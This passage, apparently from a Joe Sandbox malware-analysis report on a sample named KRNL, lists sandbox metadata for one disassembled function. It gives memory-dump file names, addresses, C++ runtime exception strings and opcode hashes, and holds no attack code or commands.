                                                                                                                                                                                                                                                            • Part of subcall function 006F060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,006EF354,00000000,?,?,?,006EF354,006E3D4A,0071759C,006E3D4A), ref: 006F066D
                                                                                                                                                                                                                                                          • ___std_exception_copy.LIBVCRUNTIME ref: 006E2673
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionRaise___std_exception_copy
                                                                                                                                                                                                                                                          • String ID: bad array new length$ios_base::badbit set
                                                                                                                                                                                                                                                          • API String ID: 3109751735-1158432155
                                                                                                                                                                                                                                                          • Opcode ID: 8db41a135dd94c215ddfb7e1d4397b9eaa452265a8cee651155429ce22747484
                                                                                                                                                                                                                                                          • Instruction ID: 604c0ce2b604bc0234580df0db794dc208271eba5c89ba3b93fdbdc1fe117293
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8db41a135dd94c215ddfb7e1d4397b9eaa452265a8cee651155429ce22747484
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8F0F8F1614300EBE710AF58D846757BBE8EB58718F11892CF5989B381D3B9D894CB92